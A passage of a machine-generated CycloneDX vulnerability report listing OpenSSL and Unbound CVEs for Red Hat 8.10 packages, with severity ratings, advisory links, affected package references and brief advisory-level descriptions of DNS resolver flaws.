          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-42923",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        407
      ],
      "description": "NLnet Labs Unbound up to and including version 1.25.0 has a vulnerability in the DNSSEC validator where the code path to consult the negative cache for DS records does not take into account the limit on NSEC3 hash calculations introduced in 1.19.1. This leads to degradation of service during the attack. An adversary that controls a DNSSEC signed zone can exploit this by signing NSEC3 records with acceptably high iterations for child delegations and querying a vulnerable Unbound. Unbound will keep performing the allowed hash calculations on the NSEC3 records and will not limit the work by the mitigation introduced in 1.19.1. As a side effect, a global lock for the negative cache will be held for the duration of the hashing, blocking other threads that need to consult the negative cache. Coordinated attacks could raise the vulnerability to denial of service. Unbound 1.25.1 contains a patch with a fix to bound the vulnerable code path with the existing limit for NSEC3 hash calculations.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42923"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42923"
        },
        {
          "url": "https://nlnetlabs.nl/news/2026/May/20/unbound-1.25.1-released/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42923"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8282-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42923"
        },
        {
          "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42923.txt"
        }
      ],
      "published": "2026-05-20T10:16:27+00:00",
      "updated": "2026-07-24T10:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-42955",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        672
      ],
      "description": "In NLnet Labs Unbound 1.16.2 up to and including 1.25.1, a similar vulnerability as with CVE-2026-40622 in the 'ghost domain names' family of attacks was found in Unbound that could extend the ghost domain window by up to one cached TTL configured value for A/AAAA glue records. Similar to other 'ghost domain names' attacks, an adversary needs to control a (ghost) zone and be able to query a vulnerable Unbound. A single client A/AAAA query can cause Unbound to overwrite the cached expired parent-side glue rrset and essentially extend the ghost domain window by up to one cached TTL configured value ('cache-max-ttl'). In configurations where 'harden-referral-path: yes' is used (non-default configuration), no client query is required since Unbound implicitly performs that query. This is a variant of CVE-2026-40622 which only addressed the NS query.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42955"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42955"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42955"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42955"
        },
        {
          "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42955.txt"
        }
      ],
      "published": "2026-07-22T14:17:18+00:00",
      "updated": "2026-07-24T13:56:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-42960",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 10,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        349
      ],
      "description": "NLnet Labs Unbound up to and including version 1.25.0 is vulnerable to poisoning via promiscuous records for the authority section. Promiscuous RRSets that complement DNS replies in the authority section can be used to trick Unbound to cache such records. If an adversary is able to attach such records in a reply (i.e., spoofed packet, fragmentation attack) he would be able to poison Unbound's cache. A malicious actor can exploit the possible poisonous effect by injecting RRSets other than NS that are also accompanied by address records in a reply, for example MX. This could be achieved by trying to spoof a reply packet or fragmentation attacks. Unbound would then accept the relative address records in the additional section and cache them if the authority RRSet has enough trust at this point, i.e., in-zone data for the delegation point. Unbound 1.25.1 contains a patch with a fix that disregards address records from the additional section if they are not explicitly relevant only to authority NS records, mitigating the possible poison effect. This is a complement fix to CVE-2025-11411.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42960"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42960"
        },
        {
